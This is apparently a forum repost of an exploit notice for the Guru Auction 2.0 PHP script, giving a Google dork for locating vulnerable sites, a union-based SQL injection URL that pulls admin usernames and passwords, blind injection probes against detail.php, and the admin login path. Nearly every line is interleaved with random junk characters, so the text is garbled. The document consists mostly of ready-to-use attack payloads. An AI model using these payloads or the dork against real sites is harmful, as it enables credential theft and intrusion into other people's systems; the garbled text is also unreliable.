Guru Auction 2.0 Multiple SQL Injection Vulnerabilities7 {5 w% U* }+ ]& k. D# {" j
! i- X$ W( t4 j4 Q8 B6 j; [5 P7 p作者 : v3n0m5 X/ O; R) j- Q# T( I0 d6 Q
应用 : Guru Auction 2.02 {0 S* v% O5 o
Price : $49; U+ D6 e" J* b. r! a5 ?- t3 b
Vendor : http://www.guruscript.com/
- @. S8 r0 z# [& O9 {! jGoogle Dork : inurl:subcat.php?cate_id=; E- {% R/ r, L; B& L* @
% Y ?# K! p& b# N+ GSQLi p0c:6 n" s1 N- ?1 j# Y, b
~~~~~~~~~~8 h# F X, S* L9 m
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--( V5 d: U% w1 }3 F3 u8 |
+ `! P, e$ l. s8 f) ?, _ 0 Q7 a/ l* D3 `# F# o1 }* K
盲注 p0c:
9 Y z+ K, T: [2 X% J8 [& A~~~~~~~~~~& p' X/ ~$ Q# Y9 N h
http://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
: Q) M/ W6 _6 u b, h7 nhttp://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false
8 f& w3 O: ^& W: l/ y, P+ ~ ! m$ C4 y% d; P& L
管理登录入口:
) N$ ?4 @, q% i4 r+ T; c~~~~~~~~~~5 [. O5 a" M# z3 C0 o; u, B
http://domain.tld/[path]/admin/
2 T3 o1 k7 V) u0 U0 ]% z% \ |
发表于 2012-12-31 09:24:05
收藏
支持
反对